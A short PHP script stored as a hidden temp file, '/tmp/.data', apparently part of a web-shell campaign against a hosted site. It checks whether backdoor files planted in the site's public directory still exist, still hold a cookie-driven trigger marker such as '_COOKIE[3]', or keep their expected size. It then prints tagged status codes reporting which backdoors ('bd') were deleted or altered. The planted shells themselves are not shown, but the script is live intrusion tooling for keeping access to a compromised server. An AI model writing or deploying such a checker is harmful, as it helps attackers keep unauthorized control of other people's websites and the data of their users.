File: //tmp/.data
<?php $r = '/var/www/vhost/disk-apps/agile-selling-central.bikenow.co/public'; $x = ["/index.php"=>"bd@@178096@@_COOKIE[3]",
"/css/_default.php"=>"bd@@178103@@Feature-Policy",
"/img/timezone.php"=>"bd@@178115@@706",
"/js/redirect5.php"=>"bd@@178125@@1661",
"/forgot_pass.php"=>"bd@@178135@@224"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');